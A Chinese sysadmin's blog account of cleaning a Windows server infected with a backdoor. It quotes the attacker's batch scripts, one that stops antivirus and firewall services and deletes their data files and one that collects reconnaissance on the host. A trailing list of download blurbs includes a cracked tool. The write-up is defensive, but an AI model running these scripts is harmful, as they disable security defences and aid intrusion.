<iframe align="center" marginwidth="0" marginheight="0" src="http://www.zealware.com/csdnblog336280.html" frameborder="0" width="336" scrolling="no" height="280"></iframe>
一早来开机就发现Host Monitor报告Web Server出问题了,SQL Server No Answer,远程到此机器,AVG的定时扫描报告说C:/WINNT/SYSTEM32/SPOOL/下HELP中的Secure.bat有病毒,顺着检查发现C:/WINNT/SYSTEM32/SPOOL/下比平时多了一个Help的隐藏目录,于是学警察BaiBai用ALT+Print Screen对现场做了个快照,然后将Help目录打包下来,将目录删除,并将此次事件写入系统运维记录,遗憾的是引子Secure.bat给我第一时间删除了,以后发现问题得先保留现场再处理。
分析一下Help的内容(如下),基本上以收集信息为主,再加上一个Telsrv的程序,充分体现了孙子兵法里面知己知彼,百战不殆的精神:
AV_FW.bat,用来停止各种Anti Virus以及防火墙如BackICE的服务,并且最后还删除了历史扫描记录和病毒数据库文件;
Fport.exe,用来收集端口信息,包括守护在端口的进程,并将收集的结果保存到Fport.txt中;
regedit.exe,注册表编辑器;
kill.exe,PsKill v1.03 - local and remote process killer;
system.bat,报告系统信息,以及找到Serv-U信息,并将结果保存到Systeminfo.txt中;
telsrv.exe,一个Telnet Server,http://www.pcmicro.com/netfoss/telsrv.html;
由于这台服务器是自己接手的,是一台All in One的服务器,于是一步一步来:
※根据Secure.bat在Google上找到了Symantec一个有关Backdoor.Sumtax的安全公告:http://securityresponse.symantec.com/avcenter/venc/data/backdoor.sumtax.html,按照说明检查了相关的地方,并清理了注册表;
※重新检查服务,将不需要的服务都关闭了(也纳闷怎么开了那么多乱七八糟的服务);
※使用%SystemRoot%/system32/wupdmgr.exe到微软站点打足补丁;
※重新修改了SQL Server的SA密码,将本地Administrator改名,同时也修改密码,并写入服务器运维报告;
※将可疑的进程都Kill掉,并且查看以下的键值,将可疑的进程都砍掉;
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnce
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Runonce
AV_FW.bat的内容:
net stop _Avp32.exe /y >> av_fw.txt
net stop _Avpcc.exe /y >> av_fw.txt
net stop _Avpm.exe /y >> av_fw.txt
net stop Ackwin32.exe /y >> av_fw.txt
net stop Agnitum Outpost Firewall /y >> av_fw.txt
net stop Anti-Trojan.exe /y >> av_fw.txt
net stop ANTIVIR /y >> av_fw.txt
......
net stop AVCONSOL /y >> av_fw.txt
net stop WEBTRAP /y >> av_fw.txt
net stop POP3TRAP /y >> av_fw.txt
del c:/*ANTI-VIR*.DAT /s /q >> av_fw.txt
del c:/*CHKLIST*.DAT /s /q >> av_fw.txt
del c:/*CHKLIST*.MS /s /q >> av_fw.txt
del c:/*CHKLIST*.CPS /s /q >> av_fw.txt
del c:/*CHKLIST*.TAV /s /q v
......
system.bat的内容:
@echo off
echo System Information: > Systeminfo.txt
echo. >> Systeminfo.txt
echo. >> Systeminfo.txt
echo. >> Systeminfo.txt
echo. >> Systeminfo.txt
#OPERATING SYSTEM
echo ___________________ >> Systeminfo.txt
echo Operating System... >> Systeminfo.txt
echo ?>> Systeminfo.txt
VER >> Systeminfo.txt
#FREE SPACE
echo _____________ >> Systeminfo.txt
echo Free Space... >> Systeminfo.txt
echo ?>> Systeminfo.txt
dir c: | find "bytes" >> Systeminfo.txt
dir c: | find "libres" >> Systeminfo.txt
dir d: | find "bytes" >> Systeminfo.txt
dir d: | find "libres" >> Systeminfo.txt
dir e: | find "bytes" >> Systeminfo.txt
dir e: | find "libres" >> Systeminfo.txt
dir f: | find "bytes" >> Systeminfo.txt
dir f: | find "libres" >> Systeminfo.txt
dir g: | find "bytes" >> Systeminfo.txt
dir g: | find "libres" >> Systeminfo.txt
dir h: | find "bytes" >> Systeminfo.txt
dir h: | find "libres" >> Systeminfo.txt
#FINDING SERVU
echo ________________ >> Systeminfo.txt
echo Finding Servu... >> Systeminfo.txt
echo >> Systeminfo.txt
Dir /s /a c:/Ser*.ini >> Systeminfo.txt
Dir /s /a d:/Ser*.ini >> Systeminfo.txt
Dir /s /a e:/Ser*.ini >> Systeminfo.txt
Dir /s /a c:/Ser*.exe >> Systeminfo.txt
Dir /s /a d:/Ser*.exe >> Systeminfo.txt
Dir /s /a e:/Ser*.exe >> Systeminfo.txt
#FINDING rar
echo ________________ >> Systeminfo.txt
echo Finding RAR.. >> Systeminfo.txt
echo >> Systeminfo.txt
Dir /s /a c:/*.rar >> Systeminfo.txt
Dir /s /a d:/*.rar >> Systeminfo.txt
Dir /s /a e:/*.rar >> Systeminfo.txt
Dir /s /a f:/*.rar >> Systeminfo.txt
Dir /s /a g:/*.rar >> Systeminfo.txt
Dir /s /a h:/*.rar >> Systeminfo.txt
#FINDING mp3
echo ________________ >> Systeminfo.txt
echo Finding MP3... >> Systeminfo.txt
echo >> Systeminfo.txt
Dir /s /a c:/*.mp3 >> Systeminfo.txt
Dir /s /a d:/*.mp3 >> Systeminfo.txt
Dir /s /a e:/*.mp3 >> Systeminfo.txt
Dir /s /a f:/*.mp3 >> Systeminfo.txt
Dir /s /a g:/*.mp3 >> Systeminfo.txt
Dir /s /a h:/*.mp3 >> Systeminfo.txt
#FINDING nfo
echo ________________ >> Systeminfo.txt
echo Finding NFO... >> Systeminfo.txt
echo >> Systeminfo.txt
Dir /s /a c:/*.nfo >> Systeminfo.txt
Dir /s /a d:/*.nfo >> Systeminfo.txt
Dir /s /a e:/*.nfo >> Systeminfo.txt
Dir /s /a f:/*.nfo >> Systeminfo.txt
Dir /s /a g:/*.nfo >> Systeminfo.txt
Dir /s /a h:/*.nfo >> Systeminfo.txt
#FINDING FTP.EXE
echo ________________ >> Systeminfo.txt
echo Finding FTP... >> Systeminfo.txt
echo >> Systeminfo.txt
Dir /s /a c:/FTP.EXE >> Systeminfo.txt
Dir /s /a d:/FTP.EXE >> Systeminfo.txt
Dir /s /a e:/FTP.EXE >> Systeminfo.txt
Dir /s /a f:/FTP.EXE >> Systeminfo.txt
Dir /s /a g:/FTP.EXE >> Systeminfo.txt
Dir /s /a h:/FTP.EXE >> Systeminfo.txt
#FINDING TFTP.EXE
echo ________________ >> Systeminfo.txt
echo Finding TFTP... >> Systeminfo.txt
echo >> Systeminfo.txt
Dir /s /a c:/TFTP.EXE >> Systeminfo.txt
Dir /s /a d:/TFTP.EXE >> Systeminfo.txt
Dir /s /a e:/TFTP.EXE >> Systeminfo.txt
Dir /s /a f:/TFTP.EXE >> Systeminfo.txt
Dir /s /a g:/TFTP.EXE >> Systeminfo.txt
Dir /s /a h:/TFTP.EXE >> Systeminfo.txt
#FINDING FIREDAEMON.EXE
echo ________________ >> Systeminfo.txt
echo Finding Firedaemon... >> Systeminfo.txt
echo >> Systeminfo.txt
Dir /s /a c:/FIREDAEMON.EXE >> Systeminfo.txt
Dir /s /a d:/FIREDAEMON.EXE >> Systeminfo.txt
Dir /s /a e:/FIREDAEMON.EXE >> Systeminfo.txt
Dir /s /a f:/FIREDAEMON.EXE >> Systeminfo.txt
Dir /s /a g:/FIREDAEMON.EXE >> Systeminfo.txt
Dir /s /a h:/FIREDAEMON.EXE >> Systeminfo.txt
#FINDING IOFTPD
echo ________________ >> Systeminfo.txt
echo Finding Ioftpd... >> Systeminfo.txt
echo >> Systeminfo.txt
Dir /s /a c:/io*.ini >> Systeminfo.txt
Dir /s /a d:/io*.ini >> Systeminfo.txt
Dir /s /a c:/io*.exe >> Systeminfo.txt
Dir /s /a d:/io*.exe >> Systeminfo.txt
Dir /s /a c:/rai*.ini >> Systeminfo.txt
Dir /s /a d:/rai*.ini >> Systeminfo.txt
Dir /s /a c:/rai*.exe >> Systeminfo.txt
Dir /s /a d:/rai*.exe >> Systeminfo.txt
#FINDING Sub0t.ini
echo ________________ >> Systeminfo.txt
echo Finding Sub0t.ini... >> Systeminfo.txt
echo >> Systeminfo.txt
Dir /s /a c:/Sub0t.ini >> Systeminfo.txt
Dir /s /a d:/Sub0t.ini >> Systeminfo.txt
Dir /s /a e:/Sub0t.ini >> Systeminfo.txt
Dir /s /a c:/svrany.exe >> Systeminfo.txt
Dir /s /a d:/svrany.exe >> Systeminfo.txt
#FINDING ftpc.exe
echo ________________ >> Systeminfo.txt
echo Finding ftpc.exe... >> Systeminfo.txt
echo >> Systeminfo.txt
Dir /s /a c:/ftpc.exe >> Systeminfo.txt
Dir /s /a d:/ftpc.exe >> Systeminfo.txt
Dir /s /a e:/ftpc.exe >> Systeminfo.txt
Dir /s /a f:/ftpc.exe >> Systeminfo.txt
Dir /s /a g:/ftpc.exe >> Systeminfo.txt
Dir /s /a h:/ftpc.exe >> Systeminfo.txt
#RUNNING SERVICES
echo ___________________ >> Systeminfo.txt
echo Running Services... >> Systeminfo.txt
echo ?>> Systeminfo.txt
NET START >> Systeminfo.txt
#RUNNING SERVICES
echo ______ >> Systeminfo.txt
echo SET... >> Systeminfo.txt
echo >> Systeminfo.txt
SET >> Systeminfo.txt
#INSTALLED SOFTWARE
echo _____________________ >> Systeminfo.txt
echo Installed Software... >> Systeminfo.txt
echo ?>> Systeminfo.txt
Start /Wait Regedit /E %TEMP%./Tmp HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Uninstall
Find "DisplayName" > Systeminfo.txt
Del %TEMP%./Tmp
#INSTALLED SOFTWARE
echo ___________ >> Systeminfo.txt
echo NET STAT... >> Systeminfo.txt
echo ?>> Systeminfo.txt
NETSTAT >> Systeminfo.txt
#RUNNING PROCESSES
echo ____________________ >> Systeminfo.txt
echo Running Processes... >> Systeminfo.txt
echo >> Systeminfo.txt
TASKLIST /SVC >> Systeminfo.txt
#SYSTEM INFO
echo ______________ >> Systeminfo.txt
echo System Info... >> Systeminfo.txt
echo >> Systeminfo.txt
echo. >> Systeminfo.txt
echo. >> Systeminfo.txt
相关推荐
聚生网管2010_Patch_999用户
华为OLT网管系统_v3.0.0 华为OLT自动注册
网管SNMP_Agent的快速开发.doc
开/闭基站告警信息 查看当前用户数&经纬度信息 性能指标查询 异频邻区配置 CSFB邻区配置 TD到LTE邻区配置 LTE工具使用_CNO ...中兴网管中数据备份 X2策略开启介绍 CSFB核查规范 列表太长,详细查看文档
snmp网络拓扑图形显示,VC6编译通过,适合网管开发入门使用。
一个简单的的网管登记维护系统!!!! 一个简单的的网管登记维护系统
聚生网管系统全方位介绍 ——限制P2P下载、聊天、炒股、玩游戏、上网带宽国内最强、部署最快捷、使用最简单! 聚生网管是国内最早的专业网管软件之一。2004年底推出了聚生网管系统的第一个商用版本,经过长达七年...
这是我很早以前用C++Builder为某电信商做的一个网管程序,用SNMP监控硬件,用自定义协议管软件(要符合接口), 从父网也可直接监控子网, 每种硬件和软件都是用DLL接口,配置保存在数据库中,这是没有提供数据库及设计文档,...
• 网管基本概念 • TD-SCDMA网管系统主要功能 •3G网管的进一步探讨 TD-SCDMA网管_大唐
本软件为免费软件,主要用途是配合网管进行远程监控,作者允许并鼓励 自由传播,但禁止用于商业用途或在传播的过程中以任何理由收取费用。 同时,作者不对本软件做任何担保,不对因本软件导致的系统错误、数据丢失,...
聚生网管_2010_破解版(解除限制)
电信_移动_网管_SFNBU.ppt
java电信网管图形界面网管软件开发组件twaver java 3.7开发教程
一个关于网管平台服务端程序,可以对设备上线,告警,等信息进行设置
一个很好用的网络管理软件:超级网管_V53
网管安全日志 DDoS攻击的监测及防御 网管安全日志 DDoS攻击的监测及防御
crecloud云网管迷你版是一款服务器监控软件。可以实时监测服务器数据信息,支持网络虚拟机、网络数据、系统内存、硬件等数据监控操作。 1.监控全球最大的网管项目-100,000 台设备; 2.全球第一套引入“云计算”的...
网管系统集中日志管理技术规范.doc 网管系统集中日志管理技术规范.doc 网管系统集中日志管理技术规范.doc
mxview_2.3_moxa交换机网管软件2.3版本_part(分卷1) win7系统64位及以上可用。 MXview 2.1支持的节点数从原来的1000个节点增加到2000个网络节点,并增强可视化功能,对使用者而言,画面更丰富,操作更容易。...
呼叫网管呼叫网管呼叫网管呼叫网管呼叫网管呼叫网管呼叫网管